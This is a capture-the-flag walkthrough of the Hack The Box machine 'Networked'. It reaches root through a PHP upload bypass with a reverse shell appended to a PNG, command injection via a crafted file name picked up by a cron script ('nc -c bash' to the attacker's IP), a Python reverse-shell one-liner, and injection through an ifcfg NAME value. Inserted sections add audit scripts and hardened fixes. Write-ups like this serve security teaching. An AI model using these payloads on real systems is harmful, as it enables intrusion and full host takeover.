Networked


Ports scan

u505@kali:~/HTB/Machines/Networked$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.146 --rate=1000

Starting masscan 1.0.5 at 2020-03-07 22:48:44 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.146
Discovered open port 80/tcp on 10.10.10.146
u505@kali:~/HTB/Machines/Networked$ nmap -sC -sV 10.10.10.146
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 17:48 EST
Nmap scan report for networked.htb (10.10.10.146)
Host is up (0.12s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.14 seconds

Port 80

It appears to be a PHP application.

u505@kali:~/HTB/Machines/Networked$ curl http://networked.htb
<html>
 <body>
 Hello mate, we're building the new FaceMash!</br>
 Help by funding us and be the new Tyler&Cameron!</br>
 Join us at the pool party this Sat to get a glimpse
 <!--upload and gallery not yet linked-->
 </body>
 </html>

Dirsearch

u505@kali:~/HTB/Machines/Networked$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "php,txt,js" -f -u http://networked.htb

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php, txt, js | HTTP method: get | Threads: 10 | Wordlist size: 18443
Error Log: /opt/utils/dirsearch/logs/errors-20-03-07_17-53-17.log
Target: http://networked.htb
[17:53:18] Starting:
[17:53:18] 403 -  215B  - /.htpasswd.php
[17:53:18] 403 -  215B  - /.htpasswd.txt
[17:53:18] 403 -  214B  - /.htpasswd.js
[17:53:28] 200 -  885B  - /backup/
[17:53:32] 403 -  210B  - /cgi-bin/
[17:53:52] 200 -   73KB - /icons/
[17:53:52] 200 -  229B  - /index.php
[17:53:53] 200 -  229B  - /index.php/
[17:53:57] 200 -    0B  - /lib.php
[17:54:08] 200 -    1KB - /photos.php
[17:54:29] 200 -  169B  - /upload.php
[17:54:30] 200 -    2B  - /uploads/
Task Completed

Backup folder

The backup folder contains a file, backup.tar.

u505@kali:~/HTB/Machines/Networked$ wget http://networked.htb/backup/backup.tar
--2020-03-07 17:57:23--  http://networked.htb/backup/backup.tar
Resolving networked.htb (networked.htb)... 10.10.10.146
Connecting to networked.htb (networked.htb)|10.10.10.146|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10240 (10K) [application/x-tar]
Saving to: ‘backup.tar’

backup.tar 100%[===================>] 10.00K --.-KB/s in 0s
2020-03-07 17:57:23 (97.3 MB/s) - ‘backup.tar’ saved [10240/10240]
u505@kali:~/HTB/Machines/Networked$ tar tvf backup.tar
-rw-r--r-- root/root       229 2019-07-09 07:33 index.php
-rw-r--r-- root/root      2001 2019-07-02 07:38 lib.php
-rw-r--r-- root/root      1871 2019-07-02 08:53 photos.php
-rw-r--r-- root/root      1331 2019-07-02 08:45 upload.php
u505@kali:~/HTB/Machines/Networked$ mkdir backup
u505@kali:~/HTB/Machines/Networked$ cd backup/
u505@kali:~/HTB/Machines/Networked/backup$ tar xvf ../backup.tar
index.php
lib.php
photos.php
upload.php

Upload.php

u505@kali:~/HTB/Machines/Networked/backup$ cat upload.php
<?php
require '/var/www/html/lib.php';

define("UPLOAD_DIR", "/var/www/html/uploads/");

if( isset($_POST['submit']) ) {
  if (!empty($_FILES["myFile"])) {
    $myFile = $_FILES["myFile"];

    if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
      echo '<pre>Invalid image file.</pre>';
      displayform();
    }

    if ($myFile["error"] !== UPLOAD_ERR_OK) {
        echo "<p>An error occurred.</p>";
        displayform();
        exit;
    }

    //$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];
    list ($foo,$ext) = getnameUpload($myFile["name"]);
    $validext = array('.jpg', '.png', '.gif', '.jpeg');
    $valid = false;
    foreach ($validext as $vext) {
      if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
        $valid = true;
      }
    }

    if (!($valid)) {
      echo "<p>Invalid image file</p>";
      displayform();
      exit;
    }
    $name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;

    $success = move_uploaded_file($myFile["tmp_name"], UPLOAD_DIR . $name);
    if (!$success) {
        echo "<p>Unable to save file.</p>";
        exit;
    }
    echo "<p>file uploaded, refresh gallery</p>";

    // set proper permissions on the new file
    chmod(UPLOAD_DIR . $name, 0644);
  }
} else {
  displayform();
}
?>

Conditions to upload a file:

  • The file name must end with jpg, png, gif or jpeg.
  • The size must be under 60 000 bytes.
  • The check_file_type function needs to validate the file.

The name of the uploaded file is the IP address (with dots replaced by _) followed by the extension. The extension is returned by the function getnameUpload.

Lib.php

u505@kali:~/HTB/Machines/Networked/backup$ cat lib.php
<?php

function getnameCheck($filename) {
  $pieces = explode('.',$filename);
  $name= array_shift($pieces);
  $name = str_replace('_','.',$name);
  $ext = implode('.',$pieces);
  #echo "name $name - ext $ext\n";
  return array($name,$ext);
}

function getnameUpload($filename) {
  $pieces = explode('.',$filename);
  $name= array_shift($pieces);
  $name = str_replace('_','.',$name);
  $ext = implode('.',$pieces);
  return array($name,$ext);
}

function check_ip($prefix,$filename) {
  //echo "prefix: $prefix - fname: $filename<br>\n";
  $ret = true;
  if (!(filter_var($prefix, FILTER_VALIDATE_IP))) {
    $ret = false;
    $msg = "4tt4ck on file ".$filename.": prefix is not a valid ip ";
  } else {
    $msg = $filename;
  }
  return array($ret,$msg);
}

function file_mime_type($file) {
  $regexp = '/^([a-z\-]+\/[a-z0-9\-\.\+]+)(;\s.+)?$/';
  if (function_exists('finfo_file')) {
    $finfo = finfo_open(FILEINFO_MIME);
    if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system
    {
      $mime = @finfo_file($finfo, $file['tmp_name']);
      finfo_close($finfo);
      if (is_string($mime) && preg_match($regexp, $mime, $matches)) {
        $file_type = $matches[1];
        return $file_type;
      }
    }
  }
  if (function_exists('mime_content_type')) {
    $file_type = @mime_content_type($file['tmp_name']);
    if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string
    {
      return $file_type;
    }
  }
  return $file['type'];
}

function check_file_type($file) {
  $mime_type = file_mime_type($file);
  echo $mime_type;
  if (strpos($mime_type, 'image/') === 0) {
      return true;
  } else {
      return false;
  }
}

function displayform() {
?>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" enctype="multipart/form-data">
 <input type="file" name="myFile">
 <br>
<input type="submit" name="submit" value="go!">
</form>
<?php
  exit();
}

?>

The functions check_file_type and file_mime_type validate the file name if:

  • The MIME type begins with image/
  • The file name matches the regular expression /^([a-z\-]+\/[a-z0-9\-\.\+]+)(;\s.+)?$/

The function getnameUpload splits the file name on . (dot): the first piece is the returned name, and the rest is the extension.

Photos.php

u505@kali:~/HTB/Machines/Networked/backup$ cat photos.php
<html>
<head>
<style type="text/css">
.tg  {border-collapse:collapse;border-spacing:0;margin:0px auto;}
.tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;}
.tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;}
.tg .tg-0lax{text-align:left;vertical-align:top}
@media screen and (max-width: 767px) {.tg {width: auto !important;}.tg col {width: auto !important;}.tg-wrap {overflow-x: auto;-webkit-overflow-scrolling: touch;margin: auto 0px;}}</style>
</head>
<body>
Welcome to our awesome gallery!</br>
See recent uploaded pictures from our community, and feel free to rate or comment</br>
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$ignored = array('.', '..', 'index.html');
$files = array();

$i = 1;
echo '<div class="tg-wrap"><table class="tg">'."\n";

foreach (scandir($path) as $file) {
  if (in_array($file, $ignored)) continue;
  $files[$file] = filemtime($path. '/' . $file);
}
arsort($files);
$files = array_keys($files);

foreach ($files as $key => $value) {
  $exploded = explode('.',$value);
  $prefix = str_replace('_','.',$exploded[0]);
  $check = check_ip($prefix,$value);
  if (!($check[0])) {
    continue;
  }
  // for HTB, to avoid too many spoilers
  if ((strpos($exploded[0], '10_10_') === 0) && (!($prefix === $_SERVER["REMOTE_ADDR"])) ) {
    continue;
  }
  if ($i == 1) {
    echo "<tr>\n";
  }

  echo '<td class="tg-0lax">';
  echo "uploaded by $check[1]<br>";
  echo "<img src='uploads/".$value."' width=100px>";
  echo "</td>\n";

  if ($i == 4) {
    echo "</tr>\n";
    $i = 1;
  } else {
    $i++;
  }
}
if ($i < 4 && $i > 1) {
  echo "</tr>\n";
}
?>
</table></div>
</body>
</html>

Uploaded images are displayed by photos.php.

Reverse shell

The vulnerability is based on an Apache misconfiguration. If the php extension is not anchored with $, a file named file.php.gif is interpreted by PHP.

bash-4.2$ cat /etc/httpd/conf.d/php.conf
AddHandler php5-script .php
AddType text/html .php
DirectoryIndex index.php
php_value session.save_handler "files"
php_value session.save_path    "/var/lib/php/session"

This is the configuration of the server, retrieved after gaining the reverse shell. The handler interprets a file as PHP if .php is in the file name.

<FilesMatch "\.php$">
   AddHandler php5-script .php
   AddType text/html .php
</FilesMatch>
DirectoryIndex index.php
php_value session.save_handler "files"
php_value session.save_path    "/var/lib/php/session"

The FilesMatch directive would avoid this vulnerability.
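An audit for this misconfiguration, as an added example that is not part of the original write-up: it flags AddHandler lines that sit outside a FilesMatch block and lists upload names the bare handler would run as PHP. The function names and the sample file names are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page). Function names are hypothetical.

# php_handler_would_run NAME
# With a bare "AddHandler php5-script .php", mod_mime considers every
# dot-separated extension of a file name (case-insensitively), so ".php"
# followed by an extension that maps no handler of its own (.png, .gif)
# still selects PHP. Exit 0 if NAME would be run as PHP.
php_handler_would_run() {
    lower=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    case "$lower" in
        *.php|*.php.*) return 0 ;;
    esac
    return 1
}

# unscoped_php_handlers FILE...
# Print AddHandler lines naming a PHP handler outside any <FilesMatch> block.
unscoped_php_handlers() {
    awk '
        { line = tolower($0) }
        line ~ /^[ \t]*<filesmatch/   { depth++; next }
        line ~ /^[ \t]*<\/filesmatch/ { if (depth > 0) depth--; next }
        depth == 0 && line ~ /^[ \t]*addhandler[ \t]+[^ \t]*php/ {
            print FILENAME ":" FNR ": " $0
        }
    ' "$@"
}

# risky_uploads DIR
# List files in DIR that the bare AddHandler would hand to PHP.
risky_uploads() {
    for f in "$1"/*; do
        [ -e "$f" ] || continue
        if php_handler_would_run "${f##*/}"; then
            printf '%s\n' "${f##*/}"
        fi
    done
}

# Demo on constructed input: the php.conf shown above and two upload names.
demo_dir=$(mktemp -d)
cat > "$demo_dir/php.conf" <<'EOF'
AddHandler php5-script .php
AddType text/html .php
DirectoryIndex index.php
EOF
mkdir "$demo_dir/uploads"
: > "$demo_dir/uploads/10_10_14_28.png"
: > "$demo_dir/uploads/10_10_14_28.php.png"
unscoped_php_handlers "$demo_dir/php.conf"
risky_uploads "$demo_dir/uploads"
rm -rf "$demo_dir"
```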

File creation

From the code, we know that the file needs:

  1. to have an image MIME type.
  2. to end with an image extension (png for example).
  3. to match the regular expression /^([a-z\-]+\/[a-z0-9\-\.\+]+)(;\s.+)?$/.

We append our reverse shell to a regular image file.

u505@kali:~/HTB/Machines/Networked$ grep CHANGE php-reverse-shell.php
$ip = '10.10.14.28';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
u505@kali:~/HTB/Machines/Networked$ cp u505.png u505.php.png
u505@kali:~/HTB/Machines/Networked$ cat php-reverse-shell.php >> u505.php.png
u505@kali:~/HTB/Machines/Networked$ file u505.php.png
u505.php.png: PNG image data, 267 x 150, 8-bit/color RGB, non-interlaced
u505@kali:~/HTB/Machines/Networked$ file --mime-type -b u505.php.png
image/png

Upload file

We upload a regular image file.

We start our listener.

u505@kali:~/HTB/Machines/Networked$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

And the reverse shell is opened.

u505@kali:~/HTB/Machines/Networked$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:59808.
Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:28:04 up 23 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
bash-4.2$ stty raw -echo
stty raw -echo
bash-4.2$ whoami
apache
bash-4.2$ hostname
networked.htb

Lateral movement

bash-4.2$ cd /home/guly
bash-4.2$ ls -la
total 28
drwxr-xr-x. 2 guly guly 159 Jul  9  2019 .
drwxr-xr-x. 3 root root  18 Jul  2  2019 ..
lrwxrwxrwx. 1 root root   9 Jul  2  2019 .bash_history -> /dev/null
-rw-r--r--. 1 guly guly  18 Oct 30  2018 .bash_logout
-rw-r--r--. 1 guly guly 193 Oct 30  2018 .bash_profile
-rw-r--r--. 1 guly guly 231 Oct 30  2018 .bashrc
-rw-------  1 guly guly 639 Jul  9  2019 .viminfo
-r--r--r--. 1 root root 782 Oct 30  2018 check_attack.php
-rw-r--r--  1 root root  44 Oct 30  2018 crontab.guly
-r--------. 1 guly guly  33 Oct 30  2018 user.txt

We don't have access to the user flag, but we can read 2 files.

bash-4.2$ cat crontab.guly
*/3 * * * * php /home/guly/check_attack.php

The program check_attack.php runs every 3 minutes.

bash-4.2$ cat check_attack.php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
  $msg='';
  if ($value == 'index.html') {
    continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}
?>

The program lists the files in the folder /var/www/html/uploads/. If the part of the file name before the first dot is not an IP address, the file is deleted. But the variable $value isn't sanitized, so we can abuse the name of the file to execute another command.
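The unsanitized deletion next to a safe one, as an added example that is not part of the original write-up or the machine's code: it models in plain shell what happens to the string exec() hands to /bin/sh, and includes a regression check that a hostile-looking name is deleted without anything else running. All function names and the sample file name are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page). Function names are hypothetical.

# delete_unsafe DIR NAME
# Mirrors exec("... /bin/rm -f $path$value ..."): the file name is pasted
# into a command string that /bin/sh then parses, metacharacters included.
delete_unsafe() {
    sh -c "rm -f $1/$2" >/dev/null 2>&1
}

# delete_safe DIR NAME
# The name is never parsed by a shell: it reaches rm as one argument.
# "--" ends option parsing, and names that could leave DIR are refused.
delete_safe() {
    case "$2" in
        ''|.|..|*/*) return 1 ;;
    esac
    rm -f -- "$1/$2"
}

# cleanup_is_safe FUNC
# Regression check: put a file with a hostile-looking name (constructed
# for this test) in a scratch uploads directory, ask FUNC to delete it, and
# exit 0 only if the file is gone and no second command was executed.
cleanup_is_safe() {
    work=$(mktemp -d) || return 2
    mkdir "$work/uploads"
    name='x ; touch injected'
    : > "$work/uploads/$name"
    ( cd "$work" && "$1" uploads "$name" ) || :
    verdict=0
    [ -e "$work/injected" ] && verdict=1          # an extra command ran
    [ -e "$work/uploads/$name" ] && verdict=1     # the file was not removed
    rm -rf "$work"
    return "$verdict"
}

for fn in delete_unsafe delete_safe; do
    if cleanup_is_safe "$fn"; then echo "$fn: ok"; else echo "$fn: FAILED"; fi
done
```

In check_attack.php itself the same effect comes from calling unlink() on the path, or from wrapping the name in escapeshellarg() if a shell command has to stay.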

Test with user apache

If we create a file and we run the script, the filename testfile doesn't correspond to an IP so it's deleted.

bash-4.2$ touch /var/www/html/uploads/testfile
bash-4.2$ php check_attack.php
attack!
rm -f /var/www/html/uploads/testfile

We start a listener.

u505@kali:~/HTB/Machines/Networked/backup$ rlwrap nc -nvlp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445

If our file name is "rev ; nc -c bash 10.10.14.28 4445" the command should become exec("nohup /bin/rm -f /var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445 > /dev/null 2>&1 &"); and it should open a reverse shell.

bash-4.2$ touch "/var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445"
touch "/var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445"
bash-4.2$ php check_attack.php
php check_attack.php
attack!
nohup: ignoring input and redirecting stderr to stdout
rm -f /var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445
;... List:; syntax illegal for recipient addresses
bash-4.2$ rm "/var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445"
rm "/var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445"

As predicted, the execution opens a reverse shell.

u505@kali:~/HTB/Machines/Networked$ rlwrap nc -lnvp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:50792.
whoami
apache
hostname
networked.htb
exit

Gain reverse shell with user guly

We start our listener again.

u505@kali:~/HTB/Machines/Networked/backup$ rlwrap nc -nvlp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445

We create the evil file.

bash-4.2$ touch "/var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445"
touch "/var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445"
bash-4.2$ date
date
Mon Mar  9 02:31:36 CET 2020

We wait until the next execution of the cron job, and our reverse shell is opened.

bash-4.2$ date
date
Mon Mar  9 02:33:08 CET 2020
bash-4.2$ rm "/var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445"
rm "/var/www/html/uploads/rev ; nc -c bash 10.10.14.28 4445"

From the reverse shell.

u505@kali:~/HTB/Machines/Networked/backup$ rlwrap nc -nvlp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:51912.
whoami
guly
python -c 'import pty; pty.spawn("/bin/bash")'
[guly@networked ~]$ stty raw -echo
stty raw -echo

User flag

[guly@networked ~]$ cat user.txt
<USER_FLAG>

Escalation of privileges

[guly@networked etc]$ cat system-release
CentOS Linux release 7.6.1810 (Core)
[guly@networked ~]$ sudo -l
Matching Defaults entries for guly on networked:
   !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
   env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
   env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
   env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
   env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
   env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
   secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:
    (root) NOPASSWD: /usr/local/sbin/changename.sh
[guly@networked ~]$ cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        echo "interface $var:"
        read x
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done

/sbin/ifup guly0

This script allows us to change the configuration in the file /etc/sysconfig/network-scripts/ifcfg-guly and bring up the interface guly0.

Test with normal user

As a normal user, guly cannot modify the file /etc/sysconfig/network-scripts/ifcfg-guly.

[guly@networked ~]$ cat /etc/sysconfig/network-scripts/ifcfg-guly
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
NAME=ps /tmp/foo
PROXY_METHOD=asodih
BROWSER_ONLY=asdoih
BOOTPROTO=asdoih

If we execute it normally, we cannot change the file ifcfg-guly, and it runs ifup with the old parameters.

[guly@networked ~]$ /usr/local/sbin/changename.sh
/usr/local/sbin/changename.sh: line 2: /etc/sysconfig/network-scripts/ifcfg-guly: Permission denied
interface NAME:
a
/usr/local/sbin/changename.sh: line 18: /etc/sysconfig/network-scripts/ifcfg-guly: Permission denied
interface PROXY_METHOD:
a
/usr/local/sbin/changename.sh: line 18: /etc/sysconfig/network-scripts/ifcfg-guly: Permission denied
interface BROWSER_ONLY:
a
/usr/local/sbin/changename.sh: line 18: /etc/sysconfig/network-scripts/ifcfg-guly: Permission denied
interface BOOTPROTO:
a
/usr/local/sbin/changename.sh: line 18: /etc/sysconfig/network-scripts/ifcfg-guly: Permission denied
grep: /etc/sysconfig/network-scripts/ifcfg-ens33: Permission denied
grep: /etc/sysconfig/network-scripts/ifcfg-ens33: Permission denied
/etc/sysconfig/network-scripts/ifcfg-guly: line 4: /tmp/foo: No such file or directory
Users cannot control this device.

I notice that the execution of ifup triggers a "no such file" error for the file /tmp/foo. This is the file in the second argument of the variable NAME.

Root shell with file /tmp/foo and reverse shell

A listener is started on port 4446.

u505@kali:~/HTB/Machines/Networked$ rlwrap nc -nlvp 4446
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446

The file /tmp/foo will open a reverse shell on our port 4446.

[guly@networked ~]$ echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.28\",4446));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" > /tmp/foo
[guly@networked network-scripts]$ chmod +x /tmp/foo

Executing the script changename.sh with the same parameters should open the reverse shell.

[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
interface NAME:
ps /tmp/foo
interface PROXY_METHOD:
asodih
interface BROWSER_ONLY:
asdoih
interface BOOTPROTO:
asdoih

It opens a reverse shell with user root.

u505@kali:~/HTB/Machines/Networked$ rlwrap nc -lvnp 4446
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:33942.
sh-4.2# whoami
whoami
root
sh-4.2# python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
[root@networked network-scripts]# stty raw -echo
stty raw -echo

Direct root shell abusing NAME variable

The first method was found because I tested and tried and saw the /tmp/foo "No such file" error (because the creator of the machine left us that clue). But after diving more into this issue, I found this article: https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f.

In my case, the NAME= attributed in these network scripts is not handled correctly. If you have white/blank space in 
the name the system tries to execute the part after the white/blank space. Which means; everything after the first 
blank space is executed as root.

It means that we can obtain a shell directly if I put bash after a white space in the variable NAME.

[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
interface NAME:
a bash
interface PROXY_METHOD:
a
interface BROWSER_ONLY:
a
interface BOOTPROTO:
a
[root@networked network-scripts]# whoami
root
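Why the space matters and how the script could write the value safely, as an added example that is not part of the original write-up or the machine's scripts: ifcfg files are sourced as shell code, so an unquoted `KEY=a b` is an assignment followed by a command. The function names and the harmless stub `probe` are constructed for illustration, and the tightened allow-list is an assumption about what the script needs to accept.

```shell
#!/bin/sh
# Added example (not from the original page or the machine's scripts).
# Function names and the stub command "probe" are hypothetical.

# sourcing_runs_probe LINE
# ifcfg-* files are read by sourcing them as shell code. Write LINE to a
# scratch file, source it, and exit 0 if a harmless stub function named
# "probe" (which only creates a marker file) ran as a side effect.
sourcing_runs_probe() {
    dir=$(mktemp -d) || return 2
    printf '%s\n' "$1" > "$dir/ifcfg-test"
    # Subshell: keeps the stub and any assigned variables out of the caller.
    ( probe() { : > "$dir/ran"; }; . "$dir/ifcfg-test" ) >/dev/null 2>&1 || :
    ran=1
    [ -e "$dir/ran" ] && ran=0
    rm -rf "$dir"
    return "$ran"
}

# write_ifcfg_var FILE KEY VALUE
# Hardened replacement for `echo $var=$x >> file`: the allow-list has no
# space or slash (the original regexp permits both), and the value is
# written inside double quotes so the line can only be an assignment.
write_ifcfg_var() {
    case "$3" in
        ''|*[!A-Za-z0-9_-]*)
            echo "wrong input for $2" >&2
            return 1 ;;
    esac
    printf '%s="%s"\n' "$2" "$3" >> "$1"
}

# Constructed inputs: the unquoted form from the write-up and the quoted form.
for line in 'NAME=a probe' 'NAME="a probe"'; do
    if sourcing_runs_probe "$line"; then
        echo "$line -> text after the space was executed"
    else
        echo "$line -> assignment only"
    fi
done
```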

Root flag

[root@networked network-scripts]# cat /root/root.txt
<ROOT_FLAG>

Daniel Simao 23:15, 7 March 2020 (EST)